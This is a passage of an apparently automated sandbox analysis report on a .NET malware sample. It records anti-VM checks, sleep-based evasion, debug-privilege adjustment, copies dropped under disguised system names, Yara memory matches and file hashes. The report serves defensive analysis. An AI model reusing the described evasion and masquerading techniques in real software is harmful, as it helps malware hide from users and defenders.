Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe TID: 7704	Thread sleep count: 369 > 30
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe TID: 7560	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe TID: 7688	Thread sleep count: 364 > 30
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe TID: 7528	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\twain_32\Registry.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\Registry.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\smartscreen.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\smartscreen.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	File Volume queried: C:\ FullSizeInformation

Source: 13ZNp2xvRU.exe, 00000000.00000002.1730295583.000000001BD22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: RRVGfHJzvQMYfWe.exe, 0000001C.00000002.1752439368.000000001BC60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 13ZNp2xvRU.exe, 00000000.00000002.1730295583.000000001BD22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\!

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\twain_32\Registry.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\Registry.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Process token adjusted: Debug
Source: C:\ProgramData\smartscreen.exe	Process token adjusted: Debug
Source: C:\ProgramData\smartscreen.exe	Process token adjusted: Debug
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Process token adjusted: Debug
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Queries volume information: C:\Users\user\Desktop\13ZNp2xvRU.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Queries volume information: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Queries volume information: C:\Windows\Panther\setup.exe\fontdrvhost.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Queries volume information: C:\Windows\Panther\setup.exe\fontdrvhost.exe VolumeInformation	Jump to behavior
Source: C:\Windows\twain_32\Registry.exe	Queries volume information: C:\Windows\twain_32\Registry.exe VolumeInformation
Source: C:\Windows\twain_32\Registry.exe	Queries volume information: C:\Windows\twain_32\Registry.exe VolumeInformation
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Queries volume information: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe VolumeInformation
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Queries volume information: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe VolumeInformation
Source: C:\ProgramData\smartscreen.exe	Queries volume information: C:\ProgramData\smartscreen.exe VolumeInformation
Source: C:\ProgramData\smartscreen.exe	Queries volume information: C:\ProgramData\smartscreen.exe VolumeInformation
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Queries volume information: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe VolumeInformation
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Queries volume information: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe VolumeInformation

Source: Yara match	File source: 00000021.00000002.1822645357.0000000002C0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1817416575.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1823482959.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.1751125350.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1822645357.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1829855431.00000000028A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1823482959.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1829855431.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1830518768.00000000023CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1830518768.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1725729204.0000000002E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1817416575.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1828805098.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1827470717.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1830518768.00000000023D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1827470717.000000000252D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1725729204.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1822130425.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1825391692.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1828805098.00000000026C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1817100149.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 13ZNp2xvRU.exe PID: 6544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RRVGfHJzvQMYfWe.exe PID: 6376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 2504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 6260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Registry.exe PID: 7188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Registry.exe PID: 7224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RRVGfHJzvQMYfWe.exe PID: 7260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RRVGfHJzvQMYfWe.exe PID: 7292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smartscreen.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smartscreen.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UserOOBEBroker.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UserOOBEBroker.exe PID: 7404, type: MEMORYSTR

ID:	1430583
Product:	CloudBasic
Start time:	22:41:06
Start date:	23.04.2024
Sample:	13ZNp2xvRU.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	2519412bd469ce3de2888aa487be8f51
SHA1:	91dd80c942023f360e81e27f4964504acb9bc4c5
SHA256:	7e98baea7a5b0d51143910cde4c5503ae15d55d6f88b4b840ae7fe79469ed12f
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Name	Type	MD5	SHA1	SHA256
C:\Program Files (x86)\Google\Update\4ed18479ee5d61	ASCII text, with very long lines (949), with no line terminators	27BD844D4F448D48A7CAED15F862D10F	8C41D05746AA0C2639EAEC18E26960DD09FAE7E9	2177ECB226AE09A67072FF617C51DBEAF845DDD585784EF4F4FD077FA5E4952D
C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	2519412BD469CE3DE2888AA487BE8F51	91DD80C942023F360E81E27F4964504ACB9BC4C5	7E98BAEA7A5B0D51143910CDE4C5503AE15D55D6F88B4B840AE7FE79469ED12F
C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Program Files (x86)\Java\4ed18479ee5d61	ASCII text, with very long lines (682), with no line terminators	B09FE916FDF562AE9773A8002B5CC6E0	15A33867BFCB1B0B5724F9B2284E16B24996BF44	4E71275B965A46F93B6B822489D533A4BFFD327E216CEA5C2B34DA7419EB77A0
C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	2519412BD469CE3DE2888AA487BE8F51	91DD80C942023F360E81E27F4964504ACB9BC4C5	7E98BAEA7A5B0D51143910CDE4C5503AE15D55D6F88B4B840AE7FE79469ED12F
C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\ProgramData\2afe4ed40d5a86	ASCII text, with no line terminators	0675EF42906D734228A5C1E642D6DA72	95D21AADABC6931CC81AF1DDBEBD74604A3866A8	FE75D6C111D64810DB3EF1D0F1F765DA50274222E00031FAE42FB26C614B397D
C:\ProgramData\smartscreen.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	2519412BD469CE3DE2888AA487BE8F51	91DD80C942023F360E81E27F4964504ACB9BC4C5	7E98BAEA7A5B0D51143910CDE4C5503AE15D55D6F88B4B840AE7FE79469ED12F
C:\ProgramData\smartscreen.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Recovery\4ed18479ee5d61	ASCII text, with very long lines (992), with no line terminators	E4153C9C57AC2C0A5AA4FB1C276FB87F	0E5666658879A81C179C3019835FBBE8E697F25A	100F73BD31E9522FBDB183D130852224A653639C77A3DE5C5ED7EC6785288CE1
C:\Recovery\RRVGfHJzvQMYfWe.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	2519412BD469CE3DE2888AA487BE8F51	91DD80C942023F360E81E27F4964504ACB9BC4C5	7E98BAEA7A5B0D51143910CDE4C5503AE15D55D6F88B4B840AE7FE79469ED12F
C:\Recovery\RRVGfHJzvQMYfWe.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\13ZNp2xvRU.exe.log	CSV text	B28E0CCD25623D173B2EB29F3A99B9DD	070E4C4A7F903505259E41AFDF7873C31F90D591	3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RRVGfHJzvQMYfWe.exe.log	CSV text	12C61586CD59AA6F2A21DF30501F71BD	E6B279DC134544867C868E3FF3C267A06CE340C7	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Registry.exe.log	CSV text	12C61586CD59AA6F2A21DF30501F71BD	E6B279DC134544867C868E3FF3C267A06CE340C7	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UserOOBEBroker.exe.log	CSV text	12C61586CD59AA6F2A21DF30501F71BD	E6B279DC134544867C868E3FF3C267A06CE340C7	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontdrvhost.exe.log	CSV text	12C61586CD59AA6F2A21DF30501F71BD	E6B279DC134544867C868E3FF3C267A06CE340C7	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smartscreen.exe.log	CSV text	12C61586CD59AA6F2A21DF30501F71BD	E6B279DC134544867C868E3FF3C267A06CE340C7	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
C:\Windows\IME\IMETC\HELP\7ccfebd9e92364	ASCII text, with very long lines (810), with no line terminators	E8CBE689578A7679FA0F2294317DE43E	DA3D26811EC8FC23728667BF84FE193B94BD3E41	0EF04E275F6A37F290484F083A162D76D98F1A4D713B13A7BAD889972A5F4B4F
C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	2519412BD469CE3DE2888AA487BE8F51	91DD80C942023F360E81E27F4964504ACB9BC4C5	7E98BAEA7A5B0D51143910CDE4C5503AE15D55D6F88B4B840AE7FE79469ED12F
C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Windows\PLA\Templates\4ed18479ee5d61	ASCII text, with no line terminators	B04BDDE8107DBBE4513DBB1F512F8237	D8A83B806458124F16064C2811F42B6013B4CF5D	10A753BDA93FEC548A865307F1FBE1D85974405068F70104D30E045B62ABDA9F
C:\Windows\PLA\Templates\RRVGfHJzvQMYfWe.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	2519412BD469CE3DE2888AA487BE8F51	91DD80C942023F360E81E27F4964504ACB9BC4C5	7E98BAEA7A5B0D51143910CDE4C5503AE15D55D6F88B4B840AE7FE79469ED12F
C:\Windows\PLA\Templates\RRVGfHJzvQMYfWe.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Windows\Panther\setup.exe\5b884080fd4f94	ASCII text, with no line terminators	E78D8A7FF432BEC29FD7E6D10FD9CAF0	40133B44CB7CAF694733C94F23F538AA64C74954	8547D81DFEB062A0A93B627B2BF06BB061C4EC1EA3BAC9BF233E4D9063BE657C
C:\Windows\Panther\setup.exe\fontdrvhost.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	2519412BD469CE3DE2888AA487BE8F51	91DD80C942023F360E81E27F4964504ACB9BC4C5	7E98BAEA7A5B0D51143910CDE4C5503AE15D55D6F88B4B840AE7FE79469ED12F
C:\Windows\Panther\setup.exe\fontdrvhost.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Windows\twain_32\Registry.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	2519412BD469CE3DE2888AA487BE8F51	91DD80C942023F360E81E27F4964504ACB9BC4C5	7E98BAEA7A5B0D51143910CDE4C5503AE15D55D6F88B4B840AE7FE79469ED12F
C:\Windows\twain_32\Registry.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Windows\twain_32\ee2ad38f3d4382	ASCII text, with no line terminators	239347DFE9162EEE12F77077DB8968DD	15856013BF408957FB8A62CEB4C4FCE02A8C336D	05306169066769843E6174C70680E8601ED04AEB010A760F517A775AC4AF1147

Windows Analysis Report 13ZNp2xvRU.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
13ZNp2xvRU.exe

Malware Threat Intel
Provided by